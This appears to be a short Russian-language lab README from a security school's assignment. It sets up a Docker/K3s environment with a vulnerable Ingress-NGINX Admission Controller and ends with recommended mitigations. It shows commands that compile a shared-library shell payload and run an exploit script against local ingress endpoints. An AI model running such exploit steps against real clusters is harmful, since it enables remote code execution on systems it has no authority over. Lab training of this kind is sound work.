
Задание для WHS3: настройка Docker-окружения с уязвимостями виртуализации (CVE)
White Hat School, 3-й набор — [Ким Соын (@salt318)] (https://github.com/salt318/vulhub)
docker compose up -d (Kubernetes-среда на базе K3s)gcc -shared -fPIC -o shell.so shell.c
python exploit.py -a https://localhost:30443/networking/v1/ingresses -i http://localhost:30080/fake/addr -s shell.so

Уязвимость отсутствия аутентификации в Ingress-NGINX Admission Controller позволяет внедрять вредоносные ресурсы Ingress или получать контроль над системой, а в сочетании с другими уязвимостями может привести к удалённому выполнению кода (RCE). Поэтому необходимо применить следующие меры безопасности: усилить аутентификацию и проверку прав доступа к Admission Controller, ужесточить логику проверки ресурсов Ingress и заблокировать внешний доступ с помощью настройки сетевых ACL (Access Control List).